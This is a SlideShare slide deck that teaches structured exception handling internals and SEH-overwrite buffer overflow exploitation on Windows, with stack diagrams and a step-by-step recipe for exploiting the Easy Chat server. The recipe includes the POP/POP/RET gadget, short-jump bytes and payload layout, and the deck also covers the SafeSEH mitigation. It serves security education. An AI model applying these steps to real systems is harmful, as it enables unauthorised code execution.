SlideShare a Scribd company logo

Seh based attack

Mihir Shah
Mihir Shah

This presentation deals with different scenarios in attacking applications vulnerable to Buffer overflow by exploiting the default SEH chain, by the SEH overwrite

Technology
1 of 35
SEH BASED BUFFER OVERFLOW
What is an Exception • An Exception is an event which occurs during execution, which requires execution of code outside normal flow of control.
Exception Basics Operating System Process __try{ //exception may occur here ….. } _except(exception filter) { //This handles the exception …..printf(“exception”); } Exception Handler
How dose the OS locate the Handlers Process Thread Information Block Exception Registration 8 bytes Pointer to Next Record Pointer to Handler Exception Registration Record FS:[0]
Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); }__except(…..) { ….. } functionB() { __try( functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SHE Demo”) }__except(….) { ….. } }
Exception Registration Linked List FS : [0] Record 1 8 bytes FFFFFF OS Handler Thread Information Block Exception Registration Process
Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ ….previous line functionB(); }__except(…..) { ….. } } functionB() { __try( functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SHE Demo”) }__except(….) { ….. } }
Exception Registration Linked List Exception Registration Thread Information Block FFFFFFF OS Handler FS : [0] Record 2 Ptr to R2 Function A Handler Record 1
Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); }__except(…..) { ….. } } functionB() { __try( ….previous line functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SHE Demo”) }__except(….) { ….. } }
Exception Registration Linked List Exception Registration Thread Information Block FS : [0] Ptr to R2 FunctionB Handler Record 1 Record 2 Record 3 Ptr to R3 FunctionA Handler FFFFFFFF OS Handler
Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); B }__except(…..) { ….. } } functionB() { __try( functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SEH Demo”) }__except(….) { ….. } }
Exception Registration Linked List Exception Registration Thread Information Block FS : [0] Ptr to R2 FunctionC Handler Record 1 Record 2 Record 3 Ptr to R3 FunctionB Handler Ptr to R4 Record 4 FFFFFFFF OS Handler FunctionA Handler
Program without SEH Main() { functionA(); } fundtionA() { __try{ functionB(); } functionB() { functionC(); { FunctionC() { print(“SHE Demo”) }
Program Stack without SEH fundC Local Variables funcB’s EBP Return Address in funcB funcC Argument 1 funcC Argument 2 fundB Local Variables funcA’s EBP Return Address in funcA funcB Argument 1 funcB Argument 2 fundA Local Variables Caller’s EBP Return Address in Caller funcAArgument 1 funcAA rgument 2 Bottom of Stack (High memory addresses) Unused Stack (Lower monory addresses) ESP EBP funcC’s Stack Frame funcB’s Stack Frame funcA’s Stake Frame
Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); }__except(…..) { ….. } } functionB() { __try( functionC(); }__except(….) { ….. } { Function { __try{ print(“SHE Demo”) }__except(….) { ….. } }
Program Stack with SEH Bottom of Stack (High memory addresses) Unused Stack (Lower monory addresses) ESP EBP funcC’s Stack Frame funcB’s Stack Frame funcA’s Stake Frame funcC Local Variables Next Exception_Registration_Record funcC Exception Handler funcB’s EBP Return Address in funB funcC Argument 1 funcC Arfument 2 funcB Local Variables Next Exception_Registration_Record funcB Exception Handler funcA’s EBP Return Address in funcA funcB Argument 1 funcB Arfument 2 funcC Local Variables Next Exception_Registration_Record funcA Exception Handler Caller’s EBP Return Address in funB funcC Argument 1 funcC Arfument 2 funcC’s Exception Registration Record funcB’s Exception Registration Record funcA’s Exception Registration Record EBP
Quick Recap of Concepts • SEH Consist of a chain Exception Registration Records • These Records are dynamically added and removed from a linked list based on where we are in code • FS : [0] points to the start of the SEH chain • When an Exception happens OS walks the SEH chain to check who can handle the exception • If a handler is found, it handles the exception; else default OS handler kicks in
Who walks the SEH chain ? Exception Dispatcher KiUserExceptionDispatcher() RtlDispatchException() RtlExecuteHandlerForException() ExecuteHandler() _except_handler()
_except_handler3() in turns calls our handler _except_handler3() { Scopetable filter-expression() _global_unwind2() RtlUnwind() RtlExcuteHandlerForUnwind() Scopetable_except block() } __try{ int*p = 0x000000 *p = 10; } _except(filter(…….)) { …..printf(“exception”); }
Handler Prototype • Protptype for the exception handler is as follows ( excpt.h ) : EXCEPTION_DISPOSITION __cdecl_except_handler( struct_EXCEPTION_RECORD *ExceptionRecord, void * EstablisherFrame, struct_CONTEXT *ContexRecord, void * Dispatchercontext );
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory Analyzing the 2 Stack Frames ExeceptionHandler() { …..EIP Exception Dispatcher Stack ….. ….. Establisher Frame ….. ….. ….. ….. ESP ESP+4 ESP+8
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory What if? ExeceptionHandler() { EIP Exception Dispatcher Stack ….. ….. Establisher Frame ….. ….. ….. ….. ESP ESP+4 ESP+8 pop eax pop ebx retn
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory Pop EAX ExeceptionHandler() { EIP Exception Dispatcher Stack ESP ESP+4 ESP+8 pop eax pop ebx retn ….. Establisher Frame ….. ….. ….. …..
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory Pop EBX ExeceptionHandler() { EIP Exception Dispatcher Stack ESP ESP+4 ESP+8 pop eax pop ebx retn ….. Establisher Frame ….. ….. ….. …..
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory RETN ExeceptionHandler() { Exception Dispatcher Stack ESP ESP+4 ESP+8 pop eax pop ebx retn Establisher Frame ….. ….. ….. …..
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory RETN ExeceptionHandler() { Exception Dispatcher Stack ESP ESP+4 ESP+8 popup eax popup ebx retn Establisher Frame ….. ….. ….. ….. EIP
Demo of overwrite with AAAAA…. • Verify the POP/POP/RET instruction sends control to the next ERR location • Cause a buffer overflow in the Easy Chat program by sending a large number of AAA
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory How do we exploit this condition? AAAA Program Stack after overwrite FS[0] Low Memory
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory How do we exploit this condition? AAAA Short JMP 6 Bytes ExceptionHandler() Program Stack after overwrite FS[0] Low Memory ExeceptionHandler() { pop eax pop ebx retn
Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory How do we exploit this condition? AAAA Short JMP 6 Bytes ExceptionHandler() NOP sled Payload Payload Payload Program Stack after overwrite FS[0] Low Memory ExeceptionHandler() { pop eax pop ebx retn Establisher Frame EIP Short JMP 6 Bytes 2 NOP Ptr to EH NOP Sled PayloadLow Memory 2 bytes 2 bytes 4 bytes Variable Length Variable Length
Lets exploit Easy chat server • Steps : Find exact offset of next ERR and ExceptionHindler() on the stack Find a POP/POP/RET sequence in module without SAFESEH Overwrite ExceptionHindler() with address of POP/POP/RET Overwrite ERR with short JMP for 6 byes => “xEBx06x90x90” Add payload 6 bytes below after the ExceptionHandler()
SEH Exploitation Protection • Modules linked with /SAFESEH cannot be used • Creates a list of “safe” exception handlers • OS will match the exception handler address with this list before executing it • If there is a match in this list, only then execution will happen • This was made by Microsoft to protect SEH from exploitation and applied Windows XP SP1 onwards
ABUSING SEH Access violation / exception is triggered Pointer to Next SEH record Current SE Handler Pop,pop,ret Shellcode (1) Exception Handler kicks in (2) Current SE Handler was overwritten and points to pop,pop,ret (3) pop,pop,ret During prologue of exception handler, address of pointer to next SEH was put on stack of ESP+8 pop pop ret puts this address in EIP and allows execution of the code at the address of “pointer to next SEH” (4) Pointer to next SEH was overwritten with jmp to shellcode

Recommended

ROP
ROPROP
ROP
Jian-Yu Li
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
A exception ekon16
A exception ekon16A exception ekon16
A exception ekon16
Max Kleiner
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
UTD Computer Security Group
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai
 

Recommended

ROP
ROPROP
ROP
Jian-Yu Li
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
A exception ekon16
A exception ekon16A exception ekon16
A exception ekon16
Max Kleiner
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
UTD Computer Security Group
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
耀德 蔡
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
Pixie Labs
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
Thomas Gregory
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
17
1717
17dano2osu
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Roy
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
zakiakhmad
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
Matt Provost
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
Controlfile
ControlfileControlfile
Controlfiledkeerthan
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 
Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014
Béo Tú
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
The Linux Foundation
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
Ce.Se.N.A. Security
 
Exploiting 101
Exploiting 101Exploiting 101
Exploiting 101
Ackcent
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
Ce.Se.N.A. Security
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 

More Related Content

What's hot

台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
耀德 蔡
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
Pixie Labs
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
Thomas Gregory
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Roy
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
zakiakhmad
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
Matt Provost
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 
Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014
Béo Tú
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
The Linux Foundation
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
Ce.Se.N.A. Security
 
Exploiting 101
Exploiting 101Exploiting 101
Exploiting 101
Ackcent
 

What's hot (20)

台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
17
1717
17
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
Controlfile
ControlfileControlfile
Controlfile
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
 
Exploiting 101
Exploiting 101Exploiting 101
Exploiting 101
 

Similar to Seh based attack

Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
Ce.Se.N.A. Security
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
UTD Computer Security Group
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Japneet Singh
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
Jian-Yu Li
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
Sam Bowne
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
Kernel TLV
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
Sam Bowne
 
Coal (1)
Coal (1)Coal (1)
Coal (1)
talhashahid40
 
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh SharmaBuffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
n|u - The Open Security Community
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
Kory Kyzar
 
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptxSEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SaiDhanushM
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
Cysinfo Cyber Security Community
 

Similar to Seh based attack (20)

Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
Coal (1)
Coal (1)Coal (1)
Coal (1)
 
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh SharmaBuffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
 
test
testtest
test
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptxSEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
 

More from Mihir Shah

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
Mihir Shah
 
Kubernetes
KubernetesKubernetes
Kubernetes
Mihir Shah
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
Mihir Shah
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
Mihir Shah
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Mihir Shah
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
Mihir Shah
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
Mihir Shah
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
Mihir Shah
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
Mihir Shah
 
ROP
ROPROP
ROP
Mihir Shah
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
Mihir Shah
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
Mihir Shah
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Mihir Shah
 

More from Mihir Shah (13)

Windows custom shellcoding
Windows custom shellcodingWindows custom shellcoding
Windows custom shellcoding
 
Kubernetes
KubernetesKubernetes
Kubernetes
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Securing docker containers
Securing docker containersSecuring docker containers
Securing docker containers
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Cracking the crypto
Cracking the cryptoCracking the crypto
Cracking the crypto
 
Stego.ppt
Stego.pptStego.ppt
Stego.ppt
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Reversing with gdb
Reversing with gdbReversing with gdb
Reversing with gdb
 
ROP
ROPROP
ROP
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
PMKID ATTACK!!
PMKID ATTACK!!PMKID ATTACK!!
PMKID ATTACK!!
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 

Recently uploaded

From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
DevOps and Testing slides at DASA Connect
